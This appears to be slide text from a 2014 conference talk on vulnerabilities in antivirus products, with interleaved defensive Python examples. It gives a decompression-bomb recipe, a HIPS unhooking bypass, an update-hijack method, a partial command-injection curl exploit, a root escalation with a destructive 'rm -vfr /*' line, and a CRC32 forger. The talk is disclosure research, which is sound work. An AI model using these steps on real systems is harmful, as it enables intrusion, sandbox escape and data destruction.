Breaking Antivirus Software
Joxean Koret, COSEINC
44CON, 2014

Breaking antivirus software: Introduction. Attacking antivirus engines. Finding ...
Available for your exploiting pleasure at the fixed addresses 0x10000000 in x86 and 0x180000000 in AMD64 (the linker's default DLL image bases).
Comodo Internet Security
It actually means Comodo Internet Security users are vulnerable to exploitation.
Koret is correct and your product sucks hard. Thanks for playing!
AV developers writing security software

Remote Denial of Service Examples: ClamAV DoS
There was a bug in ClamAV scanning icon resource
Found via dumb ass fuzzing.
Reported. Because it's Open Source...
https://bugzilla.clamav.net/show_bug.cgi?id=10650
The vulnerability was nicely handled by the ClamAV team (now Cisco).
Decompression bombs (multiple AVs)
Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001.
A compressed file with many compressed files
* Sophos finishes after ~30 seconds on a "testing" machine with 16 logical CPUs and 32 GB of RAM.
** Kaspersky creates a temporary file. A 32 GB dumb file is a ~3 MB 7z compressed one.
*** In my latest testing, ESET finishes after 1 minute with each file on my "small testing machine".
**** Sometimes, it seems to time out after 5 minutes on Windows.
Decompression bombs: How to
To create a simple decompression bomb in Unix, issue the following commands:

$ truncate -s 8589934592 dumb   # 8 GB
$ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb

That's all. The resulting file is always less than 10 MB.
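The mitigation side of the recipe above, as an added example that is not code from the talk: a Python gzip inflater that builds an in-memory bomb the same way (zeros, compressed) and then inflates under an output budget, an expansion-ratio limit and a nesting limit, aborting before memory is committed rather than after. The limit values, the sample inputs and the helper names are assumptions made for this example.

```python
"""Decompression-bomb handling (added example, not from the original slides).
Limits below are assumed policy values; sample inputs are constructed."""
import gzip
import random
import zlib

MAX_OUTPUT_BYTES = 8 * 1024 * 1024   # assumed policy: total inflated bytes allowed per file
MAX_RATIO = 100                      # assumed policy: refuse more than 100x expansion
MAX_DEPTH = 4                        # assumed policy: refuse nesting deeper than this
CHUNK = 64 * 1024                    # inflate this much per step before re-checking
GZIP_MAGIC = b"\x1f\x8b"


class DecompressionBomb(Exception):
    """Raised as soon as a limit trips; the scanner treats the file as hostile."""


def make_gzip_bomb(inflated_size: int, nesting: int = 1) -> bytes:
    """Constructed input: zeros gzip'ed `nesting` times, the in-memory
    equivalent of the truncate + gzip recipe. Zeros shrink about 1000:1."""
    data = b"\x00" * inflated_size
    for _ in range(nesting):
        data = gzip.compress(data, compresslevel=9)
    return data


def make_benign_sample() -> bytes:
    """Constructed input: 100 KB of seeded random bytes (incompressible, so the
    ratio is ~1:1) behind a plain-text prefix, gzip'ed once."""
    return gzip.compress(b"plain:" + random.Random(1234).randbytes(100_000))


def bounded_gunzip(data: bytes, budget: list, max_ratio: int = MAX_RATIO) -> bytes:
    """Inflate one gzip stream, re-checking the limits after every CHUNK.

    `budget` is a one-element list holding the remaining output allowance so
    that nested members draw from the same pool. wbits=31 selects the gzip
    container; max_length caps what each call may emit, so the check runs
    before the next chunk is produced instead of after everything is."""
    d = zlib.decompressobj(wbits=31)
    out = bytearray()
    pending = data
    while not d.eof:
        piece = d.decompress(pending, CHUNK)
        pending = d.unconsumed_tail
        if not piece and not pending and not d.eof:
            raise zlib.error("truncated gzip stream")
        out += piece
        budget[0] -= len(piece)
        if budget[0] < 0:
            raise DecompressionBomb("output budget exhausted")
        if len(out) > max_ratio * len(data):
            raise DecompressionBomb(f"expansion ratio above {max_ratio}x")
    return bytes(out)


def inflate_file(data: bytes) -> bytes:
    """Inflate a possibly nested gzip file under the limits; returns the
    innermost plaintext or raises DecompressionBomb."""
    budget = [MAX_OUTPUT_BYTES]
    depth = 0
    while data[:2] == GZIP_MAGIC:
        if depth >= MAX_DEPTH:
            raise DecompressionBomb(f"nesting deeper than {MAX_DEPTH}")
        data = bounded_gunzip(data, budget)
        depth += 1
    return data


def classify(data: bytes) -> str:
    """'ok' when the file inflates within policy, 'bomb' when any limit trips."""
    try:
        inflate_file(data)
        return "ok"
    except DecompressionBomb:
        return "bomb"


if __name__ == "__main__":
    bomb = make_gzip_bomb(32 * 1024 * 1024)
    print(f"bomb on disk: {len(bomb)} bytes -> {classify(bomb)}")
    print(f"benign sample -> {classify(make_benign_sample())}")
```

The ratio check is per layer and the byte budget is shared across layers, so a 3 KB outer file cannot hide a 32 GB inner one behind a modest outer expansion; a scanner that only caps the first level is still exposed to the "compressed file with many compressed files" variant.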
I couldn't believe that antivirus engines still failed at this trivial "attack" nowadays when I "discovered" this...
Notes about decompression bombs
These bugs are not a big deal. I know.
However, they can be used like in the following
It seems nobody cares about this bug.
Also, some companies are really funny:
http://www.cio.co.nz/article/551276/antivirus_products_riddled_security_flaws_researcher_says/

BitDefender engine
BitDefender is a Romanian antivirus engine.
Their AV core is the most widely distributed AV
LavaSoft, Immunet, QiHoo 360,...
It suffers from a number of vulnerabilities like almost all other AV engines/products out there.
Finding vulnerabilities in this engine is trivial.
(Vulnerability fixed) Modifying 2 DWORDs in a PE file packed with the Shrinker3 packer used to crash it:
Those bytes were used to calculate the file and section alignment of the new, in-memory, unpacked PE file.
When set to 0xFFFFFFFF and 0xFFFFFFF, both file and section alignment were set to 0...
BitDefender bugs
...and their values were used, later on, in some
Those 2 bugs were trivial to discover. But they failed to find them by themselves...
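What the missing validation looks like, as an added example (this is not BitDefender's code). The exact alignment calculation is not on the slides, so derive_alignment() below is an assumed stand-in that reproduces the outcome described (0xFFFFFFFF wrapping to 0); the rejection rules are the ones the PE/COFF specification states for FileAlignment and SectionAlignment, applied before any arithmetic uses the values.

```python
"""Alignment sanity checks for a rebuilt in-memory PE (added example).
derive_alignment() is an assumed model of the packer's calculation; the
validation rules follow the PE/COFF optional-header specification."""

MASK32 = 0xFFFFFFFF


def derive_alignment(raw_dword: int) -> int:
    """Assumed stand-in for the packer's calculation: a 32-bit add that wraps
    to 0 when raw_dword is 0xFFFFFFFF, the outcome the slides describe."""
    return (raw_dword + 1) & MASK32


def round_up(value: int, alignment: int) -> int:
    """The usual PE rounding helper. With alignment == 0 this divides by zero
    here; the C idiom (value + a - 1) & ~(a - 1) instead masks with 0 and
    silently returns 0, so every section lands at the same address."""
    return ((value + alignment - 1) // alignment) * alignment


def is_pow2(x: int) -> bool:
    return x != 0 and (x & (x - 1)) == 0


def validate_alignments(file_alignment: int, section_alignment: int) -> None:
    """PE/COFF rules: FileAlignment is a power of two in [0x200, 0x10000];
    SectionAlignment is a power of two and >= FileAlignment."""
    if not is_pow2(file_alignment) or not 0x200 <= file_alignment <= 0x10000:
        raise ValueError(f"bad FileAlignment 0x{file_alignment:x}")
    if not is_pow2(section_alignment) or section_alignment < file_alignment:
        raise ValueError(f"bad SectionAlignment 0x{section_alignment:x}")


def layout_sections(sizes, file_alignment: int, section_alignment: int):
    """Place sections in the rebuilt image: returns (virtual_address, raw_size)
    per section, the values an unpacker later feeds into its copy loops."""
    va, result = section_alignment, []
    for size in sizes:
        result.append((va, round_up(size, file_alignment)))
        va += round_up(size, section_alignment)
    return result


def unsafe_rebuild(sizes, raw_file_align: int, raw_sect_align: int):
    """Trusts the two attacker-controlled DWORDs, as the buggy engine did."""
    return layout_sections(sizes, derive_alignment(raw_file_align),
                           derive_alignment(raw_sect_align))


def safe_rebuild(sizes, raw_file_align: int, raw_sect_align: int):
    """Same computation, preceded by the validation the engine lacked."""
    fa, sa = derive_alignment(raw_file_align), derive_alignment(raw_sect_align)
    validate_alignments(fa, sa)
    return layout_sections(sizes, fa, sa)


if __name__ == "__main__":
    print(safe_rebuild([0x100, 0x1234], 0x1FF, 0xFFF))
    try:
        unsafe_rebuild([0x100], 0xFFFFFFFF, 0xFFFFFFFF)
    except ZeroDivisionError as e:
        print("unsafe path crashed:", e)
```

The point a fuzzer finds in minutes: a value derived from the file is used as a divisor or mask without first being checked for zero, power-of-two-ness and range.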
One more complex BitDefender bug...
(Vulnerability fixed?) Modifying a single byte in a Thinstall installer would make it crash:
After modifying one byte, the decompressed content would get corrupted. An index into a table was calculated from the corrupted content... and data likely controlled by the attacker was copied to a position also likely controllable.
Again: this bug was trivial to discover. TRIVIAL.
BitDefender notes
This and all of BitDefender's bugs don't affect BitDefender's products exclusively.
They affect many AV products out there, as previously mentioned.
Adding a new AV engine to your product may sound “cool” but you're making 3rd party bugs yours.
And, by the way, you didn't audit it before
ESET Nod32 is a well-known Slovak AV engine.
Like many other AV engines, it suffers from a number of vulnerabilities that can be trivially discovered.
One little example: a malformed PDF file.
They talk in their blog post (http://x90.es/comodofail) about their sandboxed processes.
They only sandbox processes in Windows, not in Unix.
most AV products out there, no matter what they say.
Comodo example vulnerability
I have ~9 bugs in their parsers discovered with my fuzzers (1 instance, 1 week).
Almost any malformed OLE2 container (i.e., a Word document) can make it crash.
Let's see an example bug:
Very hard, isn't it?
BTW, remember: the AV scanning processes don't run sandboxed in Linux.
"Security enhanced" software
Some AV suites come with various other software programs that are installed by default.
The most typical examples:
Rising is an anti-virus company from China.
Summary: no ASLR-enabled library at all.
Also, the AV product installs one “security enhanced”
Everything runs with “Medium” integrity level and there are 6 libraries without ASLR enabled.
Isn't it cool?
Advice to users of this Rising installed browser:
DO NOT USE THIS BROWSER.
Security enhanced products...
But, as is common with AV suites, this is not
Kingsoft distributes with the AV installer one "security enhanced browser" called Liebao (cheetah in Chinese).
It's installed by default with the AV.
Also, set as the default browser.
This browser is an exploiter's heaven and they fail
...or the lack thereof. Proof:
For users of Liebao: DO NOT USE IT.
More AV developers writing security software

Extra about Kingsoft
Also, they install adware. Yes, your AV product. It's called NaviNow.
It's from a Japanese company with the same name.
Nevertheless, an AV product is installing adware for you. Very cool...
My Sandbox is Unbreakable (TM)
Talking about sandboxes...
Some AV products, like BKAV or Comodo Internet Security, as we have seen previously, are good targets for writing targeted exploits against their users because they install a library without ASLR system wide.
But, what is this library for?
Let's take a closer look at one sandbox...
Or something similar, they said...
Comodo Internet Security
Kevin J. Judge, in Comodo's blog post, used my research to promote their product, as previously mentioned... didn't I? :)
He talks a lot about the sandbox of the product and the protection it gives and blah, blah, blah...
I did check the HIPS and, partially, the true sandbox they use to run untrusted applications.
The HIPS for ~2 hours (considering the installation
Let's see the results...
HIPS/sandbox bypass demo
Let's see the black magic behind this...
But, be warned!
You have been warned...
Comodo Internet Security's HIPS
Their sandbox (partially) and HIPS system (completely) are implemented as user-land libraries (BTW, without ASLR, the HIPS one) injected system wide:
Guard32/64.dll for the HIPS. Cmdvirt32/64.dll for the Sandbox.
The libraries simply hook some user-land functions like CreateFile, CreateProcess, etc., using madCodeHook (a genuine work of non-Comodo people).
It was a good enough technology 10 years ago.
I wonder if they patented user-land hooks. Just curious...
The obvious attack:
Call FreeLibrary(GetModuleHandle("guard32.dll")) from inside the monitored process.
Comodo Internet Security's Sandbox
On the 1st try I received error 5, "Access denied".
Then, I decided to attach a debugger and see what happens.
They are also hooking ntdll!LdrUnloadDll. From the very same library. That's all.
Final try: change the page protections of ntdll, patch the function LdrUnloadDll so the hook is removed, restore the page protections and call FreeLibrary.
Guess what? It works.
Comodo Internet Security
I only bypassed, so far, the "Partially limited", "Limited" and "Restricted" levels of the HIPS (according to the GUI this is part of the sandbox but it is not... anyway).
It took me 1 hour.
DrWeb is a Russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex), plus the Duma, to name a few customers.
More of their propaganda (the original web page I got this information from has been inaccessible since I disclosed just 1 vulnerability during SyScan 2014 Singapore):
DrWeb updating protocol
DrWeb used (still does it?) to update via HTTP only. They do not use SSL/TLS.
It used to download a catalog file first:
was signed, even the DrWeb32.dll library.
DrWeb updating protocol
The "highest grade of certificate from the government" used to require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol.
To exploit it in a LAN, intercepting these domains was enough:
...and replacing drweb32.dll with your “modified” (lzma'ed) version.
DrWeb updating protocol
Exploiting it was rather easy with ettercap, a quick Python web server and the Unix lzma tool.
You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file.
I tested the bug under Linux: full code execution is
One Russian guy wrote a Metasploit exploit for
http://habrahabr.ru/post/220113/
In my opinion, this updating protocol (is?) was horrible.
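Why a CRC32 is no defence for an updater, as an added example that is not DrWeb's code. Replacing the file and recomputing the CRC is all the attack above needed; this goes one step further and shows that even a CRC32 the defender has pinned in advance can be matched by appending four chosen bytes to an arbitrary payload, whereas a keyed check cannot be satisfied without the key. The payloads and the key are constructed for the example; hmac_check() stands in for the public-key signature a real updater should verify (over TLS, with the whole chain), it is not a recommendation to ship a shared secret in the client.

```python
"""CRC32 forging versus a keyed integrity check (added example, not DrWeb's
code). Sample payloads and the key are constructed for the demonstration."""
import hashlib
import hmac
import zlib

MASK32 = 0xFFFFFFFF

# Standard reflected CRC-32 table (the same one zlib.crc32 uses).
CRC_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    CRC_TABLE.append(_c)
# The high byte of the table entries is a permutation of 0..255, which is
# what lets the backward walk below pick each table index unambiguously.
TOP_BYTE_TO_INDEX = {entry >> 24: i for i, entry in enumerate(CRC_TABLE)}


def forge_crc32_suffix(data: bytes, target_crc: int) -> bytes:
    """Return 4 bytes s such that zlib.crc32(data + s) == target_crc.

    Walk the CRC register backwards from the target for four byte-steps to
    learn which table index each of the last four bytes must select, then
    walk forwards from the register state after `data`, choosing each byte
    so that it selects exactly that index."""
    reg = target_crc ^ MASK32                  # undo the final XOR
    indices = []
    for _ in range(4):
        idx = TOP_BYTE_TO_INDEX[reg >> 24]
        indices.append(idx)
        reg = ((reg ^ CRC_TABLE[idx]) << 8) & MASK32
    reg = zlib.crc32(data) ^ MASK32            # register state after `data`
    suffix = bytearray()
    for idx in reversed(indices):
        b = (reg ^ idx) & 0xFF
        suffix.append(b)
        reg = CRC_TABLE[(reg ^ b) & 0xFF] ^ (reg >> 8)
    return bytes(suffix)


def crc32_check(payload: bytes, expected_crc: int) -> bool:
    """The check the slides describe: anyone who controls the payload (or just
    the catalog that carries the CRC) satisfies it."""
    return zlib.crc32(payload) == expected_crc


def hmac_check(payload: bytes, key: bytes, expected_tag: bytes) -> bool:
    """Keyed integrity check (stand-in for a signature): producing a valid tag
    for a modified payload requires the key."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected_tag)


def demo() -> dict:
    genuine = b"MZ..genuine drweb32.dll bytes (constructed placeholder)"
    evil = b"MZ..attacker's replacement library (constructed placeholder)"
    key = b"vendor signing key (constructed)"
    pinned_crc = zlib.crc32(genuine)           # what a CRC-only updater pins
    pinned_tag = hmac.new(key, genuine, hashlib.sha256).digest()
    forged = evil + forge_crc32_suffix(evil, pinned_crc)
    return {
        "crc_accepts_forged": crc32_check(forged, pinned_crc),
        "hmac_accepts_forged": hmac_check(forged, key, pinned_tag),
        "hmac_accepts_genuine": hmac_check(genuine, key, pinned_tag),
    }


if __name__ == "__main__":
    print(demo())
```

Four trailing bytes are invisible to a PE loader, so the forged library loads exactly like the attacker's original; the only thing a CRC ever protected against was accidental corruption.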
DrWeb updating protocol vulnerability
The vulnerability was fixed and "an alert" issued.
In the “alert” they do not say they fixed a vulnerability.
and, I think, Chinese.
They only said that changes were made to increase the security of the update procedure.
Technically true: From no security to some security.
I did not research the update. It can be fun as I'm 99%
that the eScan product has a Linux version.
I downloaded and installed it (~1 hour because of the awful hotel connection).
Then I started checking what it installs, looking for SUID binaries, etc...
They use BitDefender and ClamAV engines, they don't have
mwconf (created during installation).
The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... It was fixed recently.
A command injection in the login form (PHP).
what not to do or how to write easy exploits, as a tutorial.
The user name and the password were used to construct an operating system command executed via PHP's "exec" function.
I was not able to inject in the user name.
Source code of login.php (I)
Source code of login.php (II)
The password sent by the user was passed to
There were some very basic checks against the
But they forgot various other characters like ';'.
Source code of common_functions.php
Then, the given password was used in the
My super-ultra-very-txupi-complex exploit for it:
$ xhost +
$ export TARGET=http://target:10080
$ curl --data "firstname.lastname@example.org&pass=1234567;
Once you're in, run this to escalate privileges:
$ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm
Or anything else you want...
$ /opt/MicroWorld/sbin/runasroot rm -vfr /*
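The vulnerable pattern and its fixes, modelled in Python as an added example (the original is PHP and is not reproduced here). The blocklist contents, the binary name and the login command are assumptions for the example; the point, as in the slides, is that a character blocklist that forgets ';' turns the password field into a second shell command, while quoting each argument (PHP's escapeshellarg, shlex.quote here) or, better, an argv call with no shell at all removes the problem.

```python
"""Shell command injection in a login handler (added example, not eScan's
PHP). BLOCKLIST and LOGIN_BINARY are assumptions made for the demonstration."""
import json
import shlex
import subprocess
import sys

BLOCKLIST = "|&`$"                                  # assumed: what the check rejected; ';' is absent
LOGIN_BINARY = "/opt/MicroWorld/bin/check_login"   # assumed name for the example


def passes_blocklist(value: str) -> bool:
    """The inadequate check: rejects a few metacharacters, forgets ';'."""
    return not any(ch in value for ch in BLOCKLIST)


def vulnerable_command(user: str, password: str) -> str:
    """The pattern behind the RCE: untrusted input pasted into a shell string."""
    if not passes_blocklist(password):
        raise ValueError("rejected by blocklist")
    return f"{LOGIN_BINARY} {user} {password}"


def quoted_command(user: str, password: str) -> str:
    """Fix 1 (what PHP's escapeshellarg does): single-quote every argument so
    the shell treats ';' and friends as data."""
    return f"{LOGIN_BINARY} {shlex.quote(user)} {shlex.quote(password)}"


def shell_commands(command_line: str) -> list:
    """Tokenise the string as a POSIX shell would and split on ';' to show how
    many separate commands the shell would actually run."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(" ".join(current))
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(" ".join(current))
    return commands


def run_with_argv(user: str, password: str) -> list:
    """Fix 2 (preferred): no shell at all; the password travels as one argv
    entry. The child is a Python one-liner standing in for the login binary so
    the example runs anywhere; it simply reports the argv it received."""
    child = [sys.executable, "-c",
             "import json, sys; print(json.dumps(sys.argv[1:]))", user, password]
    proc = subprocess.run(child, capture_output=True, text=True, check=True)
    return json.loads(proc.stdout)


if __name__ == "__main__":
    payload = "1234567;id"
    print("vulnerable :", shell_commands(vulnerable_command("admin", payload)))
    print("quoted     :", shell_commands(quoted_command("admin", payload)))
    print("argv       :", run_with_argv("admin", payload))
```

Blocklists fail because the set of characters a shell interprets depends on the shell, the quoting context and the locale; the only robust fix is to never hand untrusted bytes to a shell parser, which is what the argv form does.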
...make you more vulnerable to skilled attackers.
...are as vulnerable to attacks as any other application.
Some AV software...
...may lower your operating system protections.
...are plagued with both local and remote vulnerabilities.
Some AV companies...
...don't give a fuck about security in their products.
Recommendations

Recommendations for AV users
Do not blindly trust your AV product.
Isolate the machines with AV engines used for gateways, network inspection, etc...
Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.
Recommendations for AV companies
Audit your products: source code reviews & fuzzing.
Internal code audits are good. 3rd party ones are awesome.
Do not use the highest privileges possible for scanning network packets, files, etc...
You don't need to be root/system to scan a network packet
privileged or sandboxed, process.
Recommendations for AV companies
Run dangerous code under an emulator, VM or, at the very least, in a sandbox. I only know of 3 AVs using this approach.
The file parsers written in C/C++ code are very dangerous.
I'm talking about your AV's running processes.
Recommendations for AV companies
Do not use plain HTTP for updating your
...and verify there is nothing else after the signature.
Also, verify the whole certificate chain...
Recommendations for AV companies
Drop old code that is of no use today or make this code not available by default.
Code for MS-DOS era viruses, packers, protectors,
unsupported products nowadays.
Such old code not touched in years is likely to have vulnerabilities.
Ignore any antivirus comparative company asking you to detect malware from the Jurassic era. Avoid them.
Special for Comodo and some other AV(s)...
Recommendations for AV companies
This research is not meant to instruct users not to install AV products.
This research is meant to highlight the typical problems in AV products and push the industry to actually write secure security software.
Reporting bugs responsibly would not make
Then see the dates and what changed.
Recommendations for AV companies
Also, do not write blog posts demonizing researchers or manipulating their words in order to promote your products.
Just a friendly recommendation.
Also, never say anything that can be understood as “Hackers can't own my product”.